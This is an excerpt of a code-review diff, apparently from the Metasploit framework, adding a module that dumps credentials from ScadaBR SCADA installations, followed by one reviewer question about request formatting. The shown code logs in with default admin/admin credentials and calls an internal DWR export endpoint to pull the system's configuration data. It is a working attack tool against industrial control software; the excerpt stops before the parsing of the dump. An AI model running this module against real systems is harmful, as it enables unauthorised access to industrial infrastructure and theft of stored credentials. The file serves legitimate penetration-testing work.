modules/auxiliary/admin/http/scadabr_credential_dump.rb

```diff
@@ -0,0 +1,207 @@
+      },
+      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
+      'License'        => MSF_LICENSE,
+      'References'     => ['URL', 'http://www.scadabr.com.br/?q=node/1375'],
+      'Targets'        => [[ 'Automatic', {} ]],
+      'DisclosureDate' => 'May 28 2017'))
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('USERNAME',  [ true, 'The username for the application', 'admin' ]),
+        OptString.new('PASSWORD',  [ true, 'The password for the application', 'admin' ]),
+        OptString.new('TARGETURI', [ true, 'The base path to ScadaBR', '/ScadaBR' ])
+      ])
+  end
+
+  def login(user, pass)
+    res = send_request_cgi 'uri'       => normalize_uri(target_uri.path, 'login.htm'),
+                           'method'    => 'POST',
+                           'cookie'    => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}",
+                           'vars_post' => { 'username' => Rex::Text.uri_encode(user, 'hex-normal'),
+                                            'password' => Rex::Text.uri_encode(pass, 'hex-normal') }
+
+    unless res
+      fail_with Failure::Unreachable, "#{peer} Connection failed"
+    end
+
+    if res.code == 302 && res.headers['location'] !~ /login\.htm/ && res.get_cookies =~ /JSESSIONID=([^;]+);/
+      @cookie = res.get_cookies.scan(/JSESSIONID=([^;]+);/).flatten.first
+      print_good "#{peer} Authenticated successfully as '#{user}'"
+    else
+      fail_with Failure::NoAccess, "#{peer} Authentication failed"
+    end
+  end
+
+  def export_data
+    params = 'callCount=1',
+             "page=#{target_uri.path}/emport.shtm",
+             "httpSessionId=#{@cookie}",
+             "scriptSessionId=#{Rex::Text.rand_text_hex(32)}",
+             'c0-scriptName=EmportDwr',
+             'c0-methodName=createExportData',
+             'c0-id=0',
+             'c0-param0=string:3',
+             'c0-param1=boolean:true',
+             'c0-param2=boolean:true',
+             'c0-param3=boolean:true',
+             'c0-param4=boolean:true',
+             'c0-param5=boolean:true',
+             'c0-param6=boolean:true',
+             'c0-param7=boolean:true',
+             'c0-param8=boolean:true',
+             'c0-param9=boolean:true',
+             'c0-param10=boolean:true',
+             'c0-param11=boolean:true',
+             'c0-param12=boolean:true',
+             'c0-param13=boolean:true',
+             'c0-param14=boolean:true',
+             'c0-param15=boolean:true',
+             'c0-param16=string:100',
+             'c0-param17=boolean:true',
+             'batchId=1'
+
+    uri = normalize_uri target_uri.path, 'dwr/call/plaincall/EmportDwr.createExportData.dwr'
+    res = send_request_cgi 'uri'    => uri,
+                           'method' => 'POST',
+                           'cookie' => "JSESSIONID=#{@cookie}",
+                           'ctype'  => 'text/plain',
+                           'data'   => params.join("\n")
```

Comment:
I take it your going with the data field instead of the vars_post because of the ctype?